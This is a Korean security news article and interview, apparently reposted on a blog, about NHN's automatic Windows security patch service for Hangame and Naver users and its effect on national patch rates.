보안패치의 중요성에 대해 NHN 전상훈 보안분석팀장은 “바이러스나 악성코드 등이 사용자의 PC에 침입하기 위해서 가장 많이 이용하는 것이 윈도우 운영체제의 취약성이며 이 취약성 비율을 줄일 경우 개인 PC를 공격하는 위험성을 줄일 수 있다는 것이 보안패치 서비스의 핵심”이라고 말했다.


NHN은 한게임의 경우는 지난해 12월부터 로그인시 자동 윈도우 보안패치를 실시하고 있고, 네이버는 ‘클린 캠페인’을 통해 올해 4월부터 선택적으로 실시하고 있다.


정부나 MS측에서 고민해오던 보안패치율 증가에 대해 NHN은 그 해답을 제시해주고 있으며 인기 포털과 게임사가 힘을 합할 경우 그 시너지 효과는 엄청날 것으로 전망된다.


예를 들면, 한게임에 보안패치 자동업데이트 서비스가 실시되고 난후 5개월 여만에 전국 PC의 20%에 해당하는 510만대 가량의 PC가 보안패치를 하고 있다. 만약 이런 서비스가 주요 포털이나 인기 게임사이트에 접목 된다면 아마도 정부에서 올해말까지 목표로 하고 있는 보안패치율 80% 달성은 거뜬하지 않을까.   


한국MS측은 “국내 보안패치율을 높이기 위해 포털사나 게임사에 의뢰해 자동서비스 실시를 계획하던 차에 NHN측에서 먼저 바이러스나 악성코드 등에 국민들 PC가 너무 위험에 무방비로 노출돼 있다며 보안패치 서비스를 실시해보자는 제안이 들어와서 너무 고마웠다”고 밝혔다.


KISA는 한게임 보안패치 서비스를 필두로 10여개 포털이나 게임사에 이와같은 서비스를 실시할 것에 대한 협의와 검토 과정을 거치고 있는 것으로 알려졌다. 또한 한게임이나 네이버의 성공적인 서비스 실시에 업체들도 큰 반대없이 따라올 것으로 보인다.


자칫하면 고객들에게 불편을 줄 수도 있어 영리를 목적으로 하는 기업의 특성상 선뜻 시도하기 어려운 부분들이 있었음에도 불구하고 이러한 공익적인 측면에 관심을 기울인 NHN 보안분석팀 전상훈 팀장의 말을 직접 들어보자.    


Interview

NHN 보안분석팀 전상훈 팀장


“국내 PC 2천5백만대 중 510만대가 한게임 통해 보안패치”

“네이버에도 보안패치 서비스 전면 실시 검토중”

안전한 인터넷 환경 조성은 ‘보안패치’ 생활화가 핵심


nhn내부에서 보안패치에 대한 논의가 나온 이유가 있다면?


2005년 상반기에 악성코드 발생 비율을 확인한 결과 사용자 PC의 취약성을 이용한 공격이 대부분 이였으며 한게임의 서비스 보안을 아무리 강화를 한다 해도 사용자 정보를 훔쳐가는 악성코드에 대한 대응을 하기 위해서는 한계가 존재할 수밖에 없었다. 따라서 사용자 PC의 보안을 강화하지 않는 이상 고객의 개인정보를 보호 할 수 있는 방안이 없다는 점에서 보안패치 서비스를 고객에게 설치하는 것이 최초 논의되기 시작 했다. 사용자들의 주된 피해 요소를 확인해 본 결과 2005년에 발생된 악성코드의 경우 두 종류의 운영체제 취약성에 의해 사용자가 극심한 피해를 입은 것으로 조사하게 되었다. (MS 05-001 , MS 04-013 ) 따라서 서비스의 강화 보다는 지속적으로 피해를 입는 사용자를 위해서는 근본 원인을 제거하는 것이 문제 해결을 위한 핵심이라고 판단해 실무팀과 협의를 통해 서비스 제공을 협력하기 시작 했다. 지난해 7월부터 논의를 시작해 그해 12월 보안패치 서비스를 정식 오픈, 현재까지 운영하고 있다.

웜ㆍ바이러스ㆍ악성코드 등이 사용자의 PC에 침입하기 위해서 가장 많이 이용하는 것이 윈도우 운영체제의 취약성이며 이 취약성 비율을 줄일 경우 개인 PC를 공격하는 위험성을 줄일 수 있다는 것이 보안패치 서비스의 핵심이다.


한게임 전용백신 서비스가 실시되고 있는데 이 서비스에 대한 간략한 소개?


전용백신 서비스는 이미 설치되어 고객의 PC에서 운용 되고 있는 악성코드를 제거하기 위한 서비스로서 보안패치 서비스가 근본 원인을 제거하기 위한 서비스라면, 근본 원인 제거와 동시에 이미 설치된 악성코드(게임 관련 개인정보 유출용 악성코드)를 제거하는 부분도 동시에 이루어져야 고객의 정보를 보호할 수 있다는 취지에서 올해 1월부터 지원되고 있는 서비스로, 한게임 접속을 하는 사용자의 정보보호를 위해 실시되고 있는 서비스다. 또한 키보드 보안 서비스도 일원화된 보안 강화 프로세스의 일원으로 지난해 7월부터 진행이 되고 있다.


전용백신에 대한 보안패치만 이루어지는가 아니면 MS운영체제에 대한 보안패치도 함께 이루어지는가?


전용백신에 대한 보안패치는 별도로 이루어 지지 않으며 MS 운영체제에 대해 발생하는 치명적인 내용에 대한 보안패치가 제공되고 있다. 전용백신의 경우, 신규 악성코드 출현 시 마다 업데이트를 통해 악성코드를 제거하기 위한 업데이트가 이루어지고 있는 상황이다.


다른 포털이나 게임사에서는 유저들의 불편함 때문에 주저하고 있는 것으로 알고 있는데 NHN에서 과감하게 실시한 이유가 있다면?


현재 한게임에서는 사용자의 로그인시마다 보안패치 서비스를 선택 없이 사용하게 하고 있으며, 네이버의 경우에는 ‘클린 캠페인’을 통해 네이버 보안패치 서비스를 제공하고 있다.  네이버의 경우에는 올해 4월부터 캠페인 진행을 통해 보안패치 서비스를 제공하고 있다. 고객의 보안성을 강화하는 것이 실제적인 서비스의 향상이라는 취지에 공감하여 선도적인 기업으로서 공익에 부합하고자 하는 명제 하에 서비스를 도입하고 운영하고 있다.


언제 처음 실시했고 실시후 유저들의 반응은 어떤가?


한게임의 경우는 2005년 12월에 실시했고, 네이버는 ‘클린 캠페인’을 통해 올해 4월부터 선택적으로 실시하고 있다. 유저들의 반응은 보안성을 높이고 자신의 중요정보를 보호 할 수 있도록 편리성을 제공한다는 측면에서 좋은 반응을 얻고 있으며, 현재는 한게임의 경우 보안패치 서비스를 설치한 사용자가 5월16일 기준 510만을 넘어서 국가 전체적으로도 상당한 비율의 보안성이 강화됐을 것으로 자체 판단하고 있다.


KISA나 MS측에서는 한게임 자동보안패치서비스로 인해 보안패치율이 상당히 높아졌다고 말하고 있다. 이에 대해 어떻게 생각하는가?


5월16일 현재 510만의 사용자가 보안패치 서비스를 이용하고 있으며, 한게임 사이트 방문시 마다 전문인력이 선별한 위험성이 높은 취약성에 대해서는 실시간으로 체크가 되어 보안성이 강화되고 있다고 할 수 있다. 국가 전체적인 PC 사용비율은 2004년 통계치로 2천500만대 정도로 보고 있는데, 20% 정도의 PC에 대해 기본적인 취약성 문제를 제거함으로써 악성코드 및 웜ㆍ바이러스에 대해 문제가 없는 클린 PC로 만들고 있으므로 상당히 높아졌다고 할 수 있으며, 국가적으로도 위험요소를 줄이고 안전한 인터넷환경을 구축하는데 일정부분 기여하고 있다고 볼 수 있을 것 같다.


네이버 포털 전체로 확대 적용할 계획은 없는가?


올해 4월부터 네이버 부분에 대해서는 ‘클린 인터넷 캠페인’을 통해 사용자에게 제공을 하고 있으며, 향후 확대 적용도 긍정적으로 생각할 수 있는 부분이라 생각 된다.


전용백신 서비스는 자체 개발한 것인가?


전용백신은 외부 백신제작 업체와 협력하에 기획하고 개발이 된 것이며 서비스의 운영 및 관리는 보안팀에서 맡고 있으나, 개발 및 업데이트는 외부 백신 업체에서 담당하고 있다.


보안패치와 관련 다른 계획이 있다면?


현재로서는 연관된 계획이 없으며, 향후 Zeroday 공격이 상당히 증가할 것으로 자체 판단하고 있는데, 해당 공격과 관련해 전문인력을 통해 빠르게 대응함으로써 국가적인 위험요소를 줄여 공익성에 부합하고자 하며, 외부 위험으로부터 사용자를 보호하는 방안은 지속적으로 고민을 하고자 한다.


보안패치와 관련 정부의 지원이나 정책에 대해 하고 싶은 말이 있다면?


2006년 10월을 기해 MS의 정책이 SP2를 사용하지 않으면 보안패치를 제공하지 않는 정책으로 바뀔 예정인데, 국내에는 아직 SP2를 설치하지 않은 사용자가 많으므로 국가적인 문제가 될 수 있다고 본다. 따라서 SP2를 손쉽게 설치할 수 있도록 지원 해주는 것이 필요하다고 생각한다. 보안문제를 해결하기 위해서는 불법적인 운영체제에 대해서도 보안성 강화가 필요한데, 현재 SP2에는 정품인증을 통해 설치를 유도함으로써 불법 운영체제에 대해서는 설치가 되지 않고 있다. 악성코드 및 웜의 전파는 정상적인 사용자들에게도 영향을 미칠 수 있고 전체 인터넷 환경에 대해 위험을 줄 수 있으므로, 보안성 강화는 불법이든 정품 사용자이든 관계없이 강화 조치가 되는 것이 필요하므로, SP2의 설치지원 및 인증 관련 프로세스를 합리적으로 변경하는 것에 대해서 지원이 필요할 것 같다.


보안패치를 설치하지 않고 업그레이드 하지 않으면 어떤 피해를 입을 수 있나?


2006년 1월을 기해 WMF 확장자에 대해 신규 웜과 사용자의 개인정보를 유출하는 악성코드가 출현했는데 해당 문제에 대해서 당사 보안팀에서는 WMF에 대한 보안 패치가 공식 발표된 이후 타당성 검토 및 위험성을 판단하고, 이틀 뒤에 고객들에게 보안패치를 배포하여 문제가 확대 되지 않은 적이 있다. 보안패치를 하지 않음으로써 입을 수 있는 피해는 2005년 내내 사용자의 정보를 유출하도록 시도한 웜과 악성코드가 주로 3가지 정도의 윈도우 기본 취약성을 통해 사용자 PC에 침입한 것으로 조사가 되었다. 피해 규모가 매우 심각해 보안패치 서비스를 기획하게 되었으며, 만약 해당 취약성에 대해 패치가 이뤄지지 않는다면 사용자의 PC는 외부에서 조종할 수 있는 상태나 개인의 신상정보가 유출 될 수밖에 없는 위험성에 처한다고 판단된다. 따라서 보안패치를 시행 하는 것은 알려지거나 위험성이 있는 요소를 사전에 예방할 수 있는 서비스이며, 사용자에게 필수적인 위험요소만 선별하여 보안패치를 제공함으로써 안전한 인터넷 환경이 될 수 있을 것으로 예상하고 있다.

[길민권 기자(reporter21@boannews.com)]


Posted by 바다란

댓글을 달아 주세요